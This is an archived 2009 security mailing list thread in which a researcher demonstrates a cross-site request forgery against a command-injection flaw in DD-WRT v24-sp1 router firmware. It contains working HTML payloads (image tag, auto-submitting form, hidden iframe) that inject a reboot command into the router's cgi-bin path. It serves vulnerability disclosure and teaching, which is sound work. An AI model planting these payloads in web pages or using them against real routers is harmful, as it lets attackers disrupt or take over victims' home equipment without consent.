PaulDotCom mailing list archives

DD-WRT v24-sp1: CSRF Example (Bugtraq ID: 35742)


From: irongeek at irongeek.com (Adrian Crenshaw)
Date: Sat, 25 Jul 2009 21:51:03 -0400

I'm glad you approve, and thanks for letting us know about the exploit via
the recent podcast. I don't follow the latest vulnerabilities as well as I
should.

Adrian

On Sat, Jul 25, 2009 at 8:59 PM, Carlos Perez <carlos_perez at darkoperator.com>
wrote:

Only thing I can say: You ROCK!!!!! dude

Sent from my iPhone

On Jul 25, 2009, at 5:35 PM, Adrian Crenshaw <irongeek at irongeek.com>
wrote:

I heard Carlos talk about it, so I started to work on a writeup, which I'll
post to my site shortly. Carlos, thanks for the idea.

        I was interested in giving a real world example of a CSRF attack,
similar to the ones I mentioned in my OWASP Top 5 video
<http://www.irongeek.com/i.php?page=videos/owasp-top-5-louisville>,
and maybe use it against a piece of internal equipment that is behind a NAT
box. Then I heard about Carlos Perez's write-up
<http://www.darkoperator.com/blog/2009/7/21/using-metasploit-dd-wrt-exploit-module-thru-pivot.html>
on using Metasploit against a vulnerability in the DD-WRT v24-sp1 firmware.
I thought this would be a great way to demo the concept of using CSRF/XSS
against hardware behind a NAT, especially since I've done a video on
installing DD-WRT before
<http://www.irongeek.com/i.php?page=videos/intro-to-dd-wrt-mod-your-wireless-router-to-do-more>.
Some people think it's not a big deal since the attack request has to come
from an internal source, but they don't think about the fact that CSRF can
make the attack come from an internal source. Granted, this may not be
considered a true CSRF from the standpoint that you don't have to have
authenticated against your DD-WRT v24-sp1 router, but it works much the same
way. Carlos' demo shows using Metasploit to open a shell on the router, then
do some other messing around; I'll just show how this vulnerability could be
used to reboot the router just using HTML (there are far more deviant things
you could do). For the most part this attack essentially amounts to pointing
the browser at http://ip-of-router/cgi-bin/;some-command . Since the default
IP for most home NAT routers is 192.168.1.1, this is a pretty easy attack
that could be pulled off against people who browse a page that the attacker
controls. The attacker would not have to explicitly have the victim go to
http://ip-of-router/cgi-bin/;some-command to pull off the attack, there
are plenty of ways to make a browser automatically make the request, for
example:
IMG get:
<!-- the browser fetches the image URL as a plain GET; no image is needed -->
<img src="http://192.168.1.1/cgi-bin/;reboot">

Post method:
<!-- the form is submitted automatically by the script below it -->
<form name="csrfform" method="post" action="http://192.168.1.1/cgi-bin/;reboot">
<input type="hidden" name="input_from_form" value="Test of auto submitted form.">
</form>
<script>document.csrfform.submit()</script>

IFRAME Get:
<!-- zero-size frame so the victim never sees the router's response -->
<iframe src="http://192.168.1.1/cgi-bin/;reboot" style="width:0px; height:0px; border: 0px"></iframe>

If you would like to test this code against your DD-WRT v24-sp1 click the
link below:
        DD-WRT test page, only click if you want your router to reboot
<http://www.irongeek.com/security/ddwrttest-only-click-if-you-want-your-router-to-reboot.htm>

For information on the fix:
         http://www.dd-wrt.com

Guess it's time to patch.

_______________________________________________
Pauldotcom mailing list
Pauldotcom at mail.pauldotcom.com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: <http://pauldotcom.com>http://pauldotcom.com


